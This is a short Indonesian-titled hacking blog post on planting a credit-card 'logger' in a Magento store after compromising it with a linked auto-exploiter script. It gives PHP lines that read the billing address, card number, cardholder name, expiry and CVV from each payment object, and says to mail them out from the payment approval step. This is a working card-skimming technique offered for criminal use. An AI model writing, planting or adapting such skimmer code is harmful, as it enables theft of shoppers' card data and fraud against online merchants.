Cara Menaruh Logger Di Magento
First, you must exploit Magento site.
Here's auto exploiter script written by my homies FathurFreakz [coder]
Download Here
$payment->getOrder()->getBillingAddress(); // Billing Address
$payment->getCcType(); // CC Type
$payment->getCcOwner(); // Cardholder Name
$payment->getCcNumber(); // CC Number
sprintf('%02d-%04d', $payment->getCcExpMonth(), $payment->getCcExpYear()); // CC Expire
$payment->getCcCid(); // CC CVV
Just add mail() function inside _place() function between self::RESPONSE_CODE_APPROVED:.
Regards :)
Thanks: kapaljetz 666 | FathurFreakz ( Member Of YKBH )
Author: eMJe

Post a Comment
Untuk menyisipkan kode pendek, gunakan <i rel="code"> ... KODE ... </i>
Untuk menyisipkan kode panjang, gunakan <i rel="pre"> ... KODE ... </i>
Untuk menyisipkan gambar, gunakan <i rel="image"> ... URL GAMBAR ... </i>